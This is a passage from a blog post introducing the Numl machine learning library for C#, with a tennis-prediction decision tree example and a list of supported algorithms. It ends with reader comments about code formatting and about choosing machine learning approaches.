[Feature] public Temperature Temperature { get; set; } [Feature] public bool Windy { get; set; } [Label] public bool Play { get; set; } public static Tennis[] GetData() { return new Tennis[] { new Tennis { Play = true, Outlook=Outlook.Sunny, Temperature = Temperature.Low, Windy=true}, new Tennis { Play = false, Outlook=Outlook.Sunny, Temperature = Temperature.High, Windy=true}, new Tennis { Play = false, Outlook=Outlook.Sunny, Temperature = Temperature.High, Windy=false}, new Tennis { Play = true, Outlook=Outlook.Overcast, Temperature = Temperature.Low, Windy=true}, new Tennis { Play = true, Outlook=Outlook.Overcast, Temperature = Temperature.High, Windy= false}, new Tennis { Play = true, Outlook=Outlook.Overcast, Temperature = Temperature.Low, Windy=false}, new Tennis { Play = false, Outlook=Outlook.Rainy, Temperature = Temperature.Low, Windy=true}, new Tennis { Play = true, Outlook=Outlook.Rainy, Temperature = Temperature.Low, Windy=false} }; } } In this example we have a Tennis class that contain some properties. Outlook, Temperature and Windy are data points that are used to train the model. The property called Play is the outcome, which in this case is whether to play a game of Tennis or not. If we look at the first example in the Get Data method, then we will play a game of Tennis if the outlook is sunny, the temperature is low, yet it is windy. Once we have our test data we then need to train the model. This is done with only a few lines of code. Tennis[] data = Tennis.GetData(); var d = Descriptor.Create<Tennis>(); var g = new DecisionTreeGenerator(d); g.SetHint(false); var model = Learner.Learn(data, 0.80, 1000, g); In this case the Learner uses 80% of the data to train the model and 20% to test the model. The learner also runs the generator 1000 times and returns the most accurate model. Now that the the model has been train we can now start to make predictions from it. In the example on the site, they look to see if it is ok to play a game of tennis if, the outlook is overcast, the temperature is cool, and it is windy. Tennis t = new Tennis { Outlook = Outlook.Overcast, Temperature = Temperature.Cool, Windy = true }; model.Predict(t); In this example the expected result is that Play will return true. The process for using the supervised machine learning algorithms is primarily a two step process. The first step is the instantiation of a Generator object. The generator object then produces the actual model. The actual supervised algorithms are executed in the generator object. Some of these models are computationally expensive and take some time to complete. Each generator class is paired with a model that represents the output of the machine learning algorithm. Although these vary in size and functionality, their ultimate goal is to predict based upon the learned model. Currently this library contains the following algorithms for supervised learning: - Perceptron - Kernelized Perceptron - K Nearest Neighbors - Decision Trees - Naive Bayes - Neural Networks I think this library is fantastic and certainly has many uses. Numl makes what is normally a very complicated discipline, a lot more simple to digest. Whilst the library is very easy to use, you will need to experiment with generating different kinds of models and testing the outcomes. The more data you can train the system with the better. You’ve got some ;lt and ;gt strings in there in the code. Thanks. I will take a look. fixed. I have occasionally seen articles about particular machine learning algorithms, which can typically be summed up as “okay so you define a bunch of input neurons, hidden neurons and output neurons and now you’ve got an AI! Congratulations!” and I am left with the distinct impression they forgot to tell me something important, like how to wire up the neurons or why they work the way they do… What I have not seen yet out on the web is an explanation of how to select a machine-learning algorithm based on the nature of the input data and the desired outcome. I also have not seen a guidebook for figuring out what kinds of things are best solved with machine learning versus what kinds of things are best solved by traditional algorithms and heuristics. As an experienced non-AI programmer, every problem to me looks like it should be solved with an algorithm. Using AI simply does not occur to me. Personally I’m interested in natural language processing. I wonder where NLP and AI intersect. I know I should just go back to university for it, but my local uni has no experts in NLP. *rambling detected. killing process.*
https://stephenhaunts.com/2014/08/15/machine-learning-with-numl/
CC-MAIN-2021-21
refinedweb
1,120
57.77
Validation is one of the most important parts in any software project. Building flexible business validation is every one’s dream. Rather than writing frameworks from scratch to do these things, Microsoft validation blocks makes it a breeze. In this article we will discuss how validation application blocks help us to build flexible validations using validation application blocks. Its just a simple sixteen step process to put our business validation in action using validation blocks.. UIP block: - This article talks about Reusable Navigation and workflow for both Windows and Web using Microsoft UIP blocks. UIP block No business can work without validation. Software’s are made to make business automated so validation forms the core aspect for any software. Almost 80% projects in .NET implement validation as shown in figure below. Figure: - Validation implemented The above figure shows how business validations are implemented for a simple customer class. We have two properties customer code and customer name. Both of these properties are compulsory. So we have created a class called as ‘ClsCustomer’, with two set/get properties for customer code and customer name. If we find that customer code is empty in the set of the property we raise an error. The same methodology we have used for customer name. Now we can consume the class in the ASPX UI as shown in figure ‘Business object consumed’. We have created the object, set the properties and in case there is error we have caught the same and displayed it in a label using try catch exception blocks. Figure :- Business object consumed This implementation looks good to some extent as we have put the business validation in the class and decoupled the UI from any business validation changes. Let’s list down the common problems associated with the above methodology:- Tangled validation: - If the validation rules changes we need to compile the whole class. As the entity and the validation layer are entangled in one class, changes in validation leads to compilation of the whole class. So out first goal should be decouple this validation logic from the entity class. When we say entity class we are referring to the ‘ClsCustomer’ class. Figure :- Tangled validation Figure :- Decoupling validations from the entity class No need of compiling: - Validations are volatile entity. They change from time to time. If we can change validation constraints without compiling will lead to better maintenance of the system. One go validation and results: - The second issue is validations are executed in every set of the property and errors are displayed one by one. It would be great if we can validate all the validation once and display all the errors once. All these things can be achieved by using Microsoft validation application blocks. Step 1:- Download the Enterprise library 4.0 from here. Step 2:- Once you install it you should see the same in programs – Microsoft patterns and practices. Before we move ahead to understand how validation application blocks works. We will first walkthrough fundamentally how validation application blocks decouples the validation from the entity classes. Validation application blocks stands in between the entity class the validation. Validations are stored in configuration files like web.config or app.config depending whether it’s a web application or a windows application. So the validation blocks reads from the configuration file the rules and applies it over the entity class. We can maintain these validations using the enterprise configuration screen provided by Microsoft blocks. Figure: - Decoupling validations from entity classes Now that we have understood how validation blocks will work. We will run through a example practically to understand the concept. Step 3:- Once you have installed the block, click on Enterprise library configuration UI to define validation on the configuration file Figure :- Loading Enterprise configuration screen Step 4:- Click on open and browse to your web.config file and click the open button. Figure :- Open the web.config file Step 5:- Once you have opened the web.config file you should see a tree like structure as shown in figure ‘Add validation block’. Right click on the main tree and add the validation application block to your web.config file. Figure :- Add validation application block Step 6:- Once you have added the validation application block you should see a validation application block node. Right click on the node , select new and click the type menu. Figure: - Add the assembly type Step 7:- Once you have clicked on the type menu you should see a dialog box as shown in figure ‘Load assembly’. Figure: - Load assembly Step 8:- Click on load assembly and browse to the assembly DLL to which you want to apply validations. Figure: - Browse the assembly Step 9 :- Select the class in the assembly as shown in figure select class. Figure :- Select class Step 10:- Once you have loaded the assembly, you should see a new node ‘MyRules’ as shown in figure ‘Choose members’. Right click on ‘MyRules’ ? new and choose members. Figure: - Choose members Step 11:- Once you have clicked the choose members menu you will be popped up with a property selector box as shown in figure ‘Select properties’. In the customer class we have two properties on which we want to apply validations one is the customer name and the other is the customer code. So we will select both the properties and click ok. Figure: - Choose properties Step 12:- Once you have selected the properties you can see both the properties in the UI. To apply validation right click on let’s say customer code property. You will now see list of validations which you can apply on the property. This tutorial will not go in details about all the validations. If you are interested in the same you can read about it more on . For the current scenario we will select range validator. Figure: - Select range validator Step 13:- Once you have selected range validators, you will see the below property box for range validators. In this particular scenario we need that both the property i.e. customer code and customer name should not be empty. So in the lower bound we will put 1 , which signifies that at least one character is needed. In the lower bound type we have selected as inclusive, which means the lower bound check is compulsory. In the message template put the error message which you want to display in case there are issues. Figure: - Range validator properties Step 14 :- In the default rule select the rule which you have just made. If it’s none validations will not fire. Figure: - Select rule If you are done just save everything and watch your web.config which is now modified with the validation tags. You will see both the validation i.e. customer name and customer code in XML format inside the <validation> tag. The best part of the config file is now you can change the validation in the config file itself.You guessed right… no recompiling , no installation and completely decoupled. Figure: - Web.config with validation tags Step 15:- Ok, now that we are done with putting the validation in the web.config file. Its time to write the code which will read from the config file and apply to our entity class. So the first thing we need to reference the validation application block in our assembly references and include the name spaces in our clsCustomer class. Figure: - Reference validation application blocks Figure: - Import the validation namespace Step 16:- Once you are done with adding the namespaces its time to fire the validation. Below is the code snippet which shows how the validation application block fires the validation using the web.config file. First step create the customer object and set the property. In the second step we tell to the validation static class to validate the object. The validation static class returns validation results. This validation results are nothing but error failures in case the validation fails. In the final step we have looped through the validation results to display the error. Figure: - The validation code Ok, now that we are done its time to see the action. You can see in the UI we have just set empty properties and it showed me both the business validations errors from the collection. Figure :- Validation in action The other problem with validation is that it only does server side you can read my tutorial how we can generate client side validators using validation engine at ApplicationBlock.aspx This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL) Unable to load the assembly. The error message is 'could not load file or asembly file///c:Users\Admin\AppData\Local\Temp\tmp99CE.tmp' or one of its dependencies. This assembly is built by a runtime newer than the currently loaded runtime and can nto be loaded public string CustomerName { set { if (value.Length == 0) { throw new Exception("Customer name is compulsory"); } _strCustomerName = value; } get... } if (string.IsNullOrEmpty(value)) { throw new Exception("Customer name is compulsory"); } General News Suggestion Question Bug Answer Joke Praise Rant Admin Use Ctrl+Left/Right to switch messages, Ctrl+Up/Down to switch threads, Ctrl+Shift+Left/Right to switch pages.
http://www.codeproject.com/Articles/29777/steps-to-write-flexible-business-validation-in?msg=2764292&PageFlow=FixedWidth
CC-MAIN-2016-22
refinedweb
1,540
55.95
#include <sys/ddi.h> #include <sys/sunddi.h> int ddi_dma_addr_setup(dev_info_t *dip, struct as *as, caddr_t addr, size_t len, uint_t flags, int (*waitfp) (caddr_t), caddr_t arg, ddi_dma_lim_t * lim, ddi_dma_handle_t *handlep); This interface is obsolete. ddi_dma_addr_bind_handle(9F) should be used instead. A pointer to the device's dev_info structure. A pointer to an address space structure. Should be set to NULL, which implies kernel address space. Virtual address of the memory object. Length of the memory object in bytes. Flags that would go into the ddi_dma_req structure (see ddi_dma_req(9S)). The address of a function to call back later if resources aren't available now. The special function addresses DDI_DMA_SLEEP and DDI_DMA_DONTWAIT (see ddi_dma_req (9S)) are taken to mean, respectively, wait until resources are available or, do not wait at all and do not schedule a callback. Argument to be passed to a callback function, if such a function is specified. A pointer to a DMA limits structure for this device (see ddi_dma_lim_sparc(9S) or ddi_dma_lim_x86(9S)). If this pointer is NULL, a default set of DMA limits is assumed. Pointer to a DMA handle. See ddi_dma_setup(9F) for a discussion of handle. The ddi_dma_addr_setup() function is an interface to ddi_dma_setup(9F). It uses its arguments to construct an appropriate ddi_dma_req structure and calls ddi_dma_setup(9F) with it. See ddi_dma_setup(9F) for the possible return values for this function. The ddi_dma_addr_setup() can be called from user, interrupt, or kernel context, except when waitfp is set to DDI_DMA_SLEEP, in which case it cannot be called from interrupt context. See attributes(5) for a description of the following attributes: attributes(5), ddi_dma_buf_setup(9F), ddi_dma_free(9F), ddi_dma_htoc
https://docs.oracle.com/cd/E36784_01/html/E36886/ddi-dma-addr-setup-9f.html
CC-MAIN-2019-30
refinedweb
273
59.19
Limit colours in the colourPicker component In this tutorial you will learn how to limit the amount of colour swatches in a colour picker component. This means if you only want certain colour in your component, you can set these colours. To limit the colour swatches you need to use the ‘colors’ properties from the colourPicker component. I have limited the colours to red, yellow, green, and blue in the example below. Limit colours in the colourPicker component Step 1 Open a new AS3 Flash file. Select Window > Components and drag the ColorPicker component into the library. Step 2 On the timeline insert a new layer called ‘Actions’ and enter the following code in the actions panels. To limit the colours you will need to change the hexadecimal numbers highlighted in red below. You can find the hexadecimal numbers of the colours by clicking on either the stroke or paint bucket palette on the tool box, and the hovering over the colours. //Import the packages needed. import fl.events.ColorPickerEvent; import fl.controls.ColorPicker; import flash.geom.ColorTransform; /*Creates a new instance of the a sprite class which fills the whole stage area in black colour, and add the display object at the bottom position (index 0).*/ var bgColour:Sprite = new Sprite(); bgColour.graphics.beginFill(0x000000); bgColour.graphics.drawRect(0,0,stage.stageWidth,stage.stageHeight); addChildAt(bgColour,0); //Creates a new instances of the colour picker class. var mycolorPicker:ColorPicker = new ColorPicker(); //Limit the colours to red, yellow, green, and blue. mycolorPicker.colors = [ 0xFF0000, 0x00FF00, 0x0000FF, 0xFFFF00]; /*Moves the colour picker to (20,20) and set the size to (50,50) and add the component on the stage.*/ mycolorPicker.move(20, 20); mycolorPicker.setSize(50, 50); addChild(mycolorPicker); //Add the change event to the colour picker. mycolorPicker.addEventListener(ColorPickerEvent.CHANGE, changeBg); function changeBg (event:ColorPickerEvent):void { //Creates a new instance of the ColorTrasform class. var myColorTransform:ColorTransform = bgColour.transform.colorTransform; //An instance of selected colour from the colour picker. var theColor:Number=mycolorPicker.selectedColor; //Sets the new colour from the colour picker. myColorTransform.color=theColor; //Apply the colour changes to the movie clip. bgColour.transform.colorTransform=myColorTransform; } Step 3 Test your movie clip Ctrl + Enter. Now try clicking the colour picker and you should only see four colours in the palette. You should be able to limit the swatches in the colourPicker component 1 comments: Thanks for the toot... Helped me a great deal.
http://www.ilike2flash.com/2009/10/limit-colours-in-colourpicker-component.html
CC-MAIN-2017-04
refinedweb
404
50.02
A replacement for Django's ArrayField with a multiple select form field. Project description A replacement for Django’s ArrayField with a multiple select form field. This only makes sense if the underlying base_field is using choices. How To Use Replace all instances of your Django ArrayField model field with the new ArrayField. No functionality will be changed, except for the form field. Example from django.db import models from array_field_select.fields import ArrayField class Student(models.Model): YEAR_IN_SCHOOL_CHOICES = ( ('FR', 'Freshman'), ('SO', 'Sophomore'), ('JR', 'Junior'), ('SR', 'Senior'), ) years_in_school = ArrayField( models.CharField(max_length=2, choices=YEAR_IN_SCHOOL_CHOICES) ) Project details Download files Download the file for your platform. If you're not sure which to choose, learn more about installing packages.
https://pypi.org/project/django-array-field-select/
CC-MAIN-2018-26
refinedweb
118
53.17
Dear all, I have a window with several textctrl. I am trying to intercept the mouse click in each control, open a filedialog and set the value of the specific control with the selected file. The problem is that I would like to avoid creating hundreds of similar functions for each control, so I would like to bind one single function to all of them. What I got so far is the following def onSecond(self, event): focus = wx.TextCtrl.FindFocus() if focus.GetValue()=="": focus.SetValue("loading...") dlg = wx.FileDialog(self, message="Choose the first image (base image)",wildcard = filters, style = wx.MULTIPLE) if dlg.ShowModal() == wx.ID_OK: focus.SetValue(dlg.GetDirectory()+"; "+", ".join(str(fl[len(dlg.GetDirectory())+1:]) for fl in dlg.GetPaths())) #print dlg.GetDirectory()+"; "+", ".join(str(fl[len(dlg.GetDirectory())+1:]) for fl in dlg.GetPaths()) dlg.Destroy() The above works if the specific textctrl is empty (focus.GetValue()==""). What should I do if I want to popup the filedialog regardless of the contect of the specific control? If I get rid of if focus.GetValue()=="": I will get into an endless loop. Where am I wrong and how should I proceed? Thanks, Gianluca
https://www.daniweb.com/programming/software-development/threads/489996/multiple-textctrl-with-single-function
CC-MAIN-2018-34
refinedweb
197
51.95
Large-Scale Training of Graph Neural Networks¶ Author: Da Zheng, Chao Ma, Zheng Zhang In real-world tasks, many graphs are very large. For example, a recent snapshot of the friendship network of Facebook contains 800 million nodes and over 100 billion links. We are facing challenges on large-scale training of graph neural networks. To accelerate training on a giant graph, DGL provides two additional components: sampler and graph store. - A sampler constructs small subgraphs ( NodeFlow) from a given (giant) graph. The sampler can run on a local machine as well as on remote machines. Also, DGL can launch multiple parallel samplers across a set of machines. - The graph store contains graph embeddings of a giant graph, as well as the graph structure. So far, we provide a shared-memory graph store to support multi-processing training, which is important for training on multiple GPUs and on non-uniform memory access (NUMA) machines. The shared-memory graph store has a similar interface to DGLGraphfor programming. DGL will also support a distributed graph store that can store graph embeddings across machines in the future release. The figure below shows the interaction of the trainer with the samplers and the graph store. The trainer takes subgraphs ( NodeFlow) from the sampler and fetches graph embeddings from the graph store before training. The trainer can push new graph embeddings to the graph store afterward. In this tutorial, we use control-variate sampling to demonstrate how to use these three DGL components, extending the original code of control-variate sampling. Because the graph store has a similar API to DGLGraph, the code is similar. The tutorial will mainly focus on the difference. Graph Store¶ The graph store has two parts: the server and the client. We need to run the graph store server as a daemon before training. We provide a script run_store_server.py (link) that runs the graph store server and loads graph data. For example, the following command runs a graph store server that loads the reddit dataset and is configured to run with four trainers. python3 run_store_server.py --dataset reddit --num-workers 4 The trainer uses the graph store client to access data in the graph store from the trainer process. A user only needs to write code in the trainer. We first create the graph store client that connects with the server. We specify store_type as “shared_memory” to connect with the shared-memory graph store server. g = dgl.contrib.graph_store.create_graph_from_store("reddit", store_type="shared_mem") The sampling tutorial shows the detail of sampling methods and how they are used to train graph neural networks such as graph convolution network. As a recap, the graph convolution model performs the following computation in each layer. Control variate sampling approximates \(z_v^{(l+1)}\) as follows: In addition to the approximation, Chen et. al. applies a preprocessing trick to reduce the number of hops for sampling neighbors by one. This trick works for models such as Graph Convolution Networks and GraphSage. It preprocesses the input layer. The original GCN takes \(X\) as input. Instead of taking \(X\) as the input of the model, the trick computes \(U^{(0)}=\tilde{A}X\) and uses \(U^{(0)}\) as the input of the first layer. In this way, the vertices in the first layer does not need to compute aggregation over their neighborhood and, thus, reduce the number of layers to sample by one. For a giant graph, both \(\tilde{A}\) and \(X\) can be very large. We need to perform this operation in a distributed fashion. That is, each trainer takes part of the computation and the computation is distributed among all trainers. We can use update_all in the graph store to perform this computation. g.update_all(fn.copy_src(src='features', out='m'), fn.sum(msg='m', out='preprocess'), lambda node : {'preprocess': node.data['preprocess'] * node.data['norm']}) update_all in the graph store runs in a distributed fashion. That is, all trainers need to invoke this function and take part of the computation. When a trainer completes its portion, it will wait for other trainers to complete before proceeding with its other computation. The node/edge data now live in the graph store and the access to the node/edge data is now a little different. The graph store no longer supports data access with g.ndata/ g.edata, which reads the entire node/edge data tensor. Instead, users have to use g.nodes[node_ids].data[embed_name] to access data on some nodes. (Note: this method is also allowed in DGLGraph and g.ndata is simply a short syntax for g.nodes[:].data). In addition, the graph store supports get_n_repr/ set_n_repr for node data and get_e_repr/ set_e_repr for edge data. To initialize the node/edge tensors more efficiently, we provide two new methods in the graph store client to initialize node data and edge data (i.e., init_ndata for node data or init_edata for edge data). What happened under the hood is that these two methods send initialization commands to the server and the graph store server initializes the node/edge tensors on behalf of trainers. Here we show how we should initialize node data for control-variate sampling. h_i stores the history of nodes in layer i; agg_h_i stores the aggregation of the history of neighbor nodes in layer i. for i in range(n_layers): g.init_ndata('h_{}'.format(i), (features.shape[0], args.n_hidden), 'float32') g.init_ndata('agg_h_{}'.format(i), (features.shape[0], args.n_hidden), 'float32') After we initialize node data, we train GCN with control-variate sampling as below. The training code takes advantage of preprocessed input data in the first layer and works identically to the single-process training procedure. for nf in NeighborSampler(g, batch_size, num_neighbors, neighbor_type='in', num_hops=L-1, seed_nodes=labeled_nodes): for i in range(nf.num_blocks): # aggregate history on the original graph g.pull(nf.layer_parent_nid(i+1), fn.copy_src(src='h_{}'.format(i), out='m'), lambda node: {'agg_h_{}'.format(i): node.data['m'].mean(axis=1)}) # We need to copy data in the NodeFlow to the right context. nf.copy_from_parent(ctx=right_context) nf.apply_layer(0, lambda node : {'h' : layer(node.data['preprocess'])}) h = nf.layers[0].data['h']() The complete example code can be found here. After showing how the shared-memory graph store is used with control-variate sampling, let’s see how to use it for multi-GPU training and how to optimize the training on a non-uniform memory access (NUMA) machine. A NUMA machine here means a machine with multiple processors and large memory. It works for all backend frameworks as long as the framework supports multi-processing training. If we use MXNet as the backend, we can use the distributed MXNet kvstore to aggregate gradients among processes and use the MXNet launch tool to launch multiple workers that run the training script. The command below launches our example code for multi-processing GCN training with control variate sampling and it runs 4 trainers. python3 ../incubator-mxnet/tools/launch.py -n 4 -s 1 --launcher local \ python3 examples/mxnet/sampling/multi_process_train.py \ --graph-name reddit \ --model gcn_cv --num-neighbors 1 \ --batch-size 2500 --test-batch-size 5000 \ --n-hidden 64 It is fairly easy to enable multi-GPU training. All we need to do is to copy data to a right GPU context and invoke NodeFlow computation in that GPU context. As shown above, we specify a context right_context in copy_from_parent. To optimize the computation on a NUMA machine, we need to configure each process properly. For example, we should use the same number of processes as the number of NUMA nodes (usually equivalent to the number of processors) and bind the processes to NUMA nodes. In addition, we should reduce the number of OpenMP threads to the number of CPU cores in a processor and reduce the number of threads of the MXNet kvstore to a small number such as 4. import numa import os if 'DMLC_TASK_ID' in os.environ and int(os.environ['DMLC_TASK_ID']) < 4: # bind the process to a NUMA node. numa.bind([int(os.environ['DMLC_TASK_ID'])]) # Reduce the number of OpenMP threads to match the number of # CPU cores of a processor. os.environ['OMP_NUM_THREADS'] = '16' else: # Reduce the number of OpenMP threads in the MXNet KVstore server to 4. os.environ['OMP_NUM_THREADS'] = '4' Given the configuration above, NUMA-aware multi-processing training can accelerate training almost by a factor of 4 as shown in the figure below on an X1.32xlarge instance where there are 4 processors, each of which has 16 physical CPU cores. We can see that NUMA-unaware training cannot take advantage of computation power of the machine. It is even slightly slower than just using one of the processors in the machine. NUMA-aware training, on the other hand, takes about only 20 seconds to converge to the accuracy of 96% with 20 iterations. Distributed Sampler¶ For many tasks, we found that the sampling takes a significant amount of time for the training process on a giant graph. So DGL supports distributed samplers for speeding up the sampling process on giant graphs. DGL allows users to launch multiple samplers on different machines concurrently, and each sampler can send its sampled subgraph ( NodeFlow) to trainer machines continuously. To use the distributed sampler on DGL, users start both trainer and sampler processes on different machines. Users can find the complete demo code and launch scripts in this link and this tutorial will focus on the main difference between single-machine code and distributed code. For the trainer, developers can easily migrate the existing single-machine sampler code to the distributed setting seamlessly by just changing a few lines of code. First, users need to create a distributed SamplerReceiver object before training: sampler = dgl.contrib.sampling.SamplerReceiver(graph, ip_addr, num_sampler) The SamplerReceiver class is used for receiving remote subgraph from other machines. This API has three arguments: parent_graph, ip_address, and number_of_samplers. After that, developers can change just one line of existing single-machine training code like this: for nf in sampler: for i in range(nf.num_blocks): # aggregate history on the original graph g.pull(nf.layer_parent_nid(i+1), fn.copy_src(src='h_{}'.format(i), out='m'), lambda node: {'agg_h_{}'.format(i): node.data['m'].mean(axis=1)}) ... Here, we use the code for nf in sampler to replace the original single-machine sampling code: for nf in NeighborSampler(g, batch_size, num_neighbors, neighbor_type='in', num_hops=L-1, seed_nodes=labeled_nodes): All the other parts of the original single-machine code is not changed. In addition, developers need to write sampling logic on the sampler machine. For neighbor-sampler, developers can just copy their existing single-machine code to sampler machines like this: sender = dgl.contrib.sampling.SamplerSender(trainer_address) ... for n in num_epoch: for nf in dgl.contrib.sampling.NeighborSampler(graph, batch_size, num_neighbors, neighbor_type='in', shuffle=shuffle, num_workers=num_workers, num_hops=num_hops, add_self_loop=add_self_loop, seed_nodes=seed_nodes): sender.send(nf, trainer_id) # tell trainer I have finished current epoch sender.signal(trainer_id) The figure below shows the overall performance improvement of training GCN and GraphSage on the Reddit dataset after deploying the optimizations in this tutorial. Our NUMA optimization speeds up the training by a factor of 4. The distributed sampling achieves additional 20%-40% speed improvement for different tasks. Scale to giant graphs¶ Finally, we would like to demonstrate the scalability of DGL with giant synthetic graphs. We create three large power-law graphs with RMAT. Each node is associated with 100 features and we compute node embeddings with 64 dimensions. Below shows the training speed and memory consumption of GCN with neighbor sampling. We can see that DGL can scale to graphs with up to 500M nodes and 25B edges. Total running time of the script: ( 0 minutes 0.073 seconds) Gallery generated by Sphinx-Gallery
https://docs.dgl.ai/tutorials/models/5_giant_graph/2_giant.html
CC-MAIN-2020-29
refinedweb
1,965
56.35
Generate a Random Number For the last two book giveaways I did, I promised I would pick a winner totally at random from the comments. There were hundreds of comments, so I wasn't about to write the numbers on little bits of paper and pick them from a hat. I actually have a dice-rolling iPhone app I was going to use, but then I figured what the heck I might as well build a little webpage to do it quick. JavaScript Random Number Generating a random number with JavaScript is pretty trivially easy: var numRand = Math.floor(Math.random() * 101); That will return a random number between 1-100. But wanted to make this website a bit more useful, in that it will take a low and high value and return a random number between those two values. HTML A couple of text inputs, a "Generate!" button, and an empty div container to stick the number will do: <input type="text" id="lownumber" value="1" /> and <input type="text" id="highnumber" value="100" /> <br /> <input type="submit" id="getit" value="Generate!" /> <div id="randomnumber"></div> jQuery When the "Generate!" button is clicked, we'll do the work: $("#getit").click(function() { var numLow = $("#lownumber").val(); var numHigh = $("#highnumber").val(); var adjustedHigh = (parseFloat(numHigh) - parseFloat(numLow)) + 1; var numRand = Math.floor(Math.random()*adjustedHigh) + parseFloat(numLow); if ((IsNumeric(numLow)) && (IsNumeric(numHigh)) && (parseFloat(numLow) <= parseFloat(numHigh) && (numLow != '') && (numHigh != '')) { $("#randomnumber").text(numRand); } else { $("#randomnumber").text("Careful now..."); } return false; }); The easiest way I thought of was to subtract the low from the high, generate a random number between 1 and that, and then add the low back in. To ensure that worked, we need to check a variety of things: - The inputs aren't blank and are numbers - The first number is lower than the second I used this classic IsNumeric function to check if they were actually numbers: Updated IsNumeric function (10 times easier) thanks to James: function isNumeric(n){ return !isNaN(n); } As a final touch, I wanted to have the default numbers 1 and 100 in there, but have them easy to change. So as soon as you tab to or click either element, it clears the number and changes the color to black. It also ensures that if you tab or click there AGAIN, it WON'T do that. $("input[type=text]").each(function(){ $(this).data("first-click", true); }); $("input[type=text]").focus(function(){ if ($(this).data("first-click")) { $(this).val(""); $(this).data("first-click", false); $(this).css("color", "black"); } }); Pseudo-random please. Okay, Captain Pedantic… Thanks for the demo; nice having the code, demo and explaination on hand. One note…the demo seems to be inclusive, which i probably the intend, but the phrasing “between” usually means the min/max are excluded. I guess this can vary on one’s personal definition though. Thanks for the demo. As always Chris! thanks for this You have a problem there :). Try (for example) to generate a random in range 7 – 15. There will be an error. Moreover: try entering range 123 – 21. It will generate a number. Your problem is: You’re comparing Strings. In line 31 You have (numLow <= numHigh). It should be (parseInt(numLow, 10) <= parseInt(numHigh, 10)), so that JS will compare Integers. Good catch, thanks! You cant even put negative numbers Also, we’ll always have random.org… Your ‘isNumeric’ function is a little over the top! JavaScript gives us the isNaN (isNotANumber) method, so why not just wrap it like this: function isNumeric(n){return !isNaN(n);} forgot about isNaN. I was ganna suggest regex :) return !n.match(/[^\d*]/g); regexps are much better than isNaN Also put your isNummeric function in side your $() so it doesn’t clutter the global namespace. Thanks James, clearly that is far easier, updated! Overkill! Nice app though. How I pic random winners for my comments is just select a random email, name from the comments table where post equals the post id and use RAND() and LIMIT to pull one person at random using SQL Pseudo Random will be true laughs. But I have a question, the goal of the script is to generate an integer, isn’t it ? So why use parseFloat and not parseInt(userInput, 10) (don’t forget the base), because if we use the script you make, and we put (for instance) 2.5 for lower number and 2.75 for higher, and after generate couple of time to get random integer, you will see 3.5 some times, which is not an integer, and is out of range ;) Sorry for my english ;) I get an error in ff 3.0.7 It’s not leaving a number for me. When I submit it just goes back to defaults. Same here My bad, was messing with it fixing something else, it’s good now. Do you really need to load the entire jQuery library? From what I can see it’s only being used for something that can be done with standard DOM JS. I created something like this months ago and I used about 10 lines of plain javascript…. jQuery is very cool, but in cases lke this I think it is overkill. Anyway, thanks for sharing you knowledge! ;) Nice from you for bringing the code but we want something not random. I’m Kidding. Cris, What font is that? Chris* Sry hi , This demo is great, and so useful too :) thank you Chris :D but i want to ask a question!, how can I make it work at the first clock only ? I mean to make it get a random number from the first click only ? I’m so grateful to this great job… “^^ keep it up … and good luck . So, did I win the book? The range would from 0 – 100 with the code: var numRand = Math.floor(Math.random()*101) .random generates : 0 <= N < 1
https://css-tricks.com/generate-a-random-number/
CC-MAIN-2015-35
refinedweb
986
75.3
Returns true if the Mesh is read/write enabled, or false if it is not. When a Mesh is read/write enabled, Unity uploads the Mesh data to GPU-addressable memory, but also keeps it in CPU-addressable memory. When a Mesh is not read/write enabled, Unity uploads the Mesh data to GPU-addressable memory, and then removes it from CPU-addressable memory. You can set this value using the Read/Write Enabled checkbox when importing a model to Unity. To set the value to false at run time, set the markNoLongerReadable argument of Mesh.UploadMeshData. In most cases, you should disable this option to save runtime memory usage. You should only enable it under the following circumstances: When you read from or write to the Mesh data in your code. When you pass the Mesh to StaticBatchingUtility.Combine() to combine the Mesh at run time. When you pass the mesh to CanvasRenderer.SetMesh. When you use the Mesh to bake a NavMesh using the NavMesh building components at run time. When the Mesh is convex, you use the Mesh with a Mesh Collider, and the Mesh Collider's Transform has negative scaling (for example, (–1, 1, 1)). When you use the Mesh with a Mesh Collider, and the Mesh Collider's transform is skewed or sheared (for example, when a rotated Transform has a scaled parent Transform). When you use the Mesh with a Mesh Collider, and the Mesh Collider's Cooking Options flags are set to any value other than the default. When using a Mesh with a Particle System's Shape module or Renderer module when using not using GPU instancing. Note that the Particle System will automatically change Meshes to readable when assigned through the inspector Notes: When Unity creates a Mesh from script, this value is initially set to true. Meshes not marked readable will throw an error on accessing any data arrays from script at runtime. Access is always allowed in the Unity Editor outside of the game and rendering loop, regardless of this setting. See Also: StaticBatchingUtility.Combine. using UnityEngine; using System.Collections; public class ExampleClass : MonoBehaviour { void Start() { Mesh mesh = GetComponent<MeshFilter>().sharedMesh; print(mesh.isReadable); } }
https://docs.unity3d.com/ru/2020.2/ScriptReference/Mesh-isReadable.html
CC-MAIN-2022-21
refinedweb
365
63.29
//************************************** //INCLUDE files for :Better, Simpler,Flip-Flop "encryption" //************************************** #include <stdio.h> //************************************** // Name: Better, Simpler,Flip-Flop "encryption" // Description:It reads the binary of a file, and outputs it in reverse so the new "encrypted" file can't be normally read. To decrypt encode the new file and it will be reversed again, restoring it back to normal. Its pretty handy, and simple, please rate this code. // By: Miah! (from psc cd) //************************************** /* Backwerdz version 1.00 by Miah. It takes a file, reads it from back to front, and outputs it to a new backwards file that can't be read normally. Simple enough... On with the code! */ #include <stdio.h> main() { char fileIn[30], fileOut[30]; char byteBuff[1]; int x=-1, Fsize; printf("\t\t\tMiah's Backwerdz file encoder\n"); printf("\n\nEnter Filename to Encode/Decode: "); scanf("%s",fileIn); printf("\nEnter name to output file as: "); scanf("%s",fileOut); FILE *in, *out; in = fopen(fileIn, "rb"); //Need that "b" so it can read binary too! out = fopen(fileOut, "wb"); //And write it.. fseek(in, 0, SEEK_END); Fsize = ftell(in);//This fTells us the size of the file by going to the end // and reading what the number of the last byte is fseek(in, -1, SEEK_END); //We seek a negative one (-1) from our position at the //end of the file so we read it backwards do { fseek(in, x, SEEK_END); fread(&byteBuff,1,1,in); //read and write at the same time fwrite(&byteBuff,1,1,out); x--; //Continue to countdown Fsize--; //Decrease size count so we can }while(Fsize > 0); //Break the loop when it reaches zero fclose(in); //Close It! fclose(out); return 0; }.
http://planet-source-code.com/vb/scripts/ShowCode.asp?txtCodeId=2345&lngWId=3
CC-MAIN-2019-43
refinedweb
280
68.5
